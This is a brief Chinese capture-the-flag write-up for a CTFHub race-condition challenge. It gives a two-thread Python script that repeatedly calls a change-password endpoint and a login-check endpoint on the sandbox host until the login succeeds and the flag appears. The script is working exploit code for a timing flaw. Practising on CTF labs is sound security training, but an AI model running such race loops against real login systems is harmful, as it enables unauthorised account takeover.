进入场景,显示如下
本题考察条件竞争,需要你改完密码后登录要比系统自动更改密码快
python脚本如下,需要同时开2个线程
# __author__ = Serena import threading import requests def change_passwd(): while True: ur11 = 'http://challenge-c167c601e92f8c09.sandbox.ctfhub.com:10800/change_passwd.php?passwd=123456&passwd_confirm=123456' resp1 = requests.get(ur11) def login_check(): while True: url2 = 'http://challenge-c167c601e92f8c09.sandbox.ctfhub.com:10800/login_check.php?passwd=123456' resp2 = requests.get(url2) print(resp2.text) if __name__ == '__main__': t1 = threading.Thread(target=change_passwd) t2 = threading.Thread(target=login_check) t1.start() t2.start()
成功拿到flag